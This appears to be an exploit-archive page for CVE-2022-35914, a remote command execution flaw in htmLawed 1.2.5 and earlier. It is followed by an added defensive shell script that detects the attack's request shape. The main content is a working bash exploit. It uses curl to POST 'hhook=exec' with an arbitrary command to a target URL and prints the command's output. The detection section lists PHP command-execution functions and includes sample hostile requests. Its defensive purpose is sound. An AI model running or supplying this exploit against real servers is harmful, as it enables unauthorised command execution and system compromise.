htmLawed 1.2.5 Remote Command Execution

2024.05.05
Credit: d4t4s3c
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

#!/bin/bash

# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914

while getopts ":u:c:" arg; do
  case ${arg} in
    u) url=${OPTARG}; let parameter_counter+=1 ;;
    c) cmd=${OPTARG}; let parameter_counter+=1 ;;
  esac
done

if [ -z "${url}" ] || [ -z "${cmd}" ]; then
  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
  echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
  exit 1
else
  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
  echo -e "\n[+] Executing Command: ${cmd}\n"
  cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\&gt;' | sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/')
  echo -e "${cmd_output}\n"
  exit 0
fi
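
A defender-side check for the request shape the script above sends (a POST body carrying `hhook=exec`), as an added example that is not part of the original advisory or the exploit author's code. The one-request-per-line input format, the sample lines, the request paths and the function names `find_hhook_abuse` and `sample_requests` are assumptions made for illustration.

```shell
#!/bin/sh
# Added defensive example: flag captured POST bodies whose "hhook" parameter
# names a PHP function that runs OS commands.
# Assumed input format (constructed), one request per line:
#   <client-ip> <request-path> <post-body>
# Bodies are compared as captured; decode them first if your capture
# stores them percent-encoded.

# PHP built-ins that execute OS commands.
CMD_FUNCS="exec system passthru shell_exec popen proc_open"

# Reads request lines on stdin and prints "<ip> <path> hhook=<value>"
# for every request that sets hhook to one of CMD_FUNCS.
find_hhook_abuse() {
    awk -v funcs="$CMD_FUNCS" '
    BEGIN { n = split(funcs, f, " "); for (i = 1; i <= n; i++) bad[f[i]] = 1 }
    {
        body = $0
        sub(/^[^ ]+ +[^ ]+ +/, "", body)      # drop ip and path, keep the body
        np = split(body, params, "&")
        for (i = 1; i <= np; i++) {
            eq = index(params[i], "=")
            if (eq == 0) continue
            key = substr(params[i], 1, eq - 1)
            val = tolower(substr(params[i], eq + 1))  # PHP function names are case-insensitive
            if (key == "hhook" && (val in bad))
                print $1, $2, "hhook=" val
        }
    }'
}

# Constructed sample requests (not real traffic; paths are placeholders).
sample_requests() {
    cat <<'EOF'
192.0.2.10 /app/test-page.php sid=foo&hhook=exec&text=id
192.0.2.11 /app/test-page.php sid=abc&hhook=htmlspecialchars&text=<b>hi</b>
192.0.2.12 /app/test-page.php sid=abc&text=hello&hhook=SYSTEM
198.51.100.7 /app/form.php name=bob&comment=hhook+is+a+word
EOF
}

sample_requests | find_hhook_abuse
```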

